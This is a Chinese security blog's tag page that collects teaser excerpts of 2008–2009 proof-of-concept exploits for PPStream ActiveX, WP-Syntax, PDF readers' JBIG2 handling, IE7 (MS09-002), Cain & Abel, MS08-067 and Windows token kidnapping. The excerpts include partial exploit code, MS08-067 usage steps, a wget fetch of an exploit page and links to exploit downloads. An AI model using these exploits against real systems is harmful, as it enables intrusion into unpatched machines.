标签 ‘PoC’ 下的日志

PPstream 2.6.86.8900 PPSMediaList ActiveX Remote BOF PoC

2009/09/04 0:59 | 鬼仔 | 工具收集 | 9 个回复

(1):
<!–
******************************************************************************
PPStream is the most huge p2p media player in the world.
There are two hundred million ppstream users in the world.
The vulnerability is exploitable,but I have no time to make it,you could visit my blog for detail.^@^
welcome to http://0dayexpose.blogspot.com/

COM Object – {D22DE742-04CD-4B5C-A8A3-82AB3DAEC43D} PPSMediaList Control
COM Object Filename : C:\PROGRA~1\PPStream\MList.ocx
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Company Name : PPStream Inc.
Version : V2.6.86.8900
Web Site : http://www.ppstream.com
*******************************************************************************
阅读全文 »

Tags: , ,

WordPress Plugin WP-Syntax < = 0.9.1 Remote Command Execution PoC

2009/08/14 18:37 | 鬼仔 | 技术文章 | 3 个回复

============================================================
Wordpress Plugin WP-Syntax <= 0.9.1 Remote Command Execution
============================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /’ \ __ /’__`\ /\ \__ /’__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /’ _ `\ \/\ \/_/_\_<_ /’___\ \ \/\ \ \ \ \/\`’__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
阅读全文 »

Tags: , , ,

Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day

2009/02/24 15:15 | 鬼仔 | 工具收集 | 2 个回复

#!/usr/bin/perl
# k`sOSe 02/22/2009

# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

my $size = “\x40\x00”;
my $factor = “ABCD”;
my $data = “A” x 8314;
阅读全文 »

Tags: , , ,

Multiple PDF Readers JBIG2 Local Buffer Overflow PoC

2009/02/24 15:13 | 鬼仔 | 工具收集 | 1 个回复

causes an exception at 41414141

http://milw0rm.com/sploits/2009-41414141.pdf

# milw0rm.com [2009-02-23]

Tags: ,

MS Internet Explorer 7 Memory Corruption PoC (MS09-002)

2009/02/19 15:05 | 鬼仔 | 工具收集 | 1 个回复 
<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"

took a little but found it. /str0ke
-->
 阅读全文 »
Tags: , ,

Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC

2008/12/02 16:01 | 鬼仔 | 工具收集 | 消灭0回复 
# exploit.py
##########################################################
# Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC
# (other versions may also affected)
# By:Encrypt3d.M!nd
#    encrypt3d.blogspot.com
#
# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder
##########################################################
#
 阅读全文 »
Tags: ,

MS Windows Server Service Code Execution PoC (MS08-067)

2008/10/24 12:51 | 鬼仔 | 工具收集 | 18 个回复

In vstudio command prompt:

mk.bat

next:

attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/…)

net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc

In some cases, /user:”” “”, will suffice (i.e., anonymous connection)
阅读全文 »

Tags: ,

Token Kidnapping Windows 2008 PoC exploit

2008/10/21 12:56 | 鬼仔 | 工具收集 | 6 个回复

鬼仔注:发过MS Windows 2003 Token Kidnapping Local Exploit PoC,这次是2008.

Now it’s time for Windows 2008 exploit (it should work on Windows 2003 too)
You will see that the super secure IIS 7 can be owned, too weak by default :)

You can find the PoC exploit here http://www.argeniss.com/research/Churrasco2.zip
Enjoy.

Tags: , , ,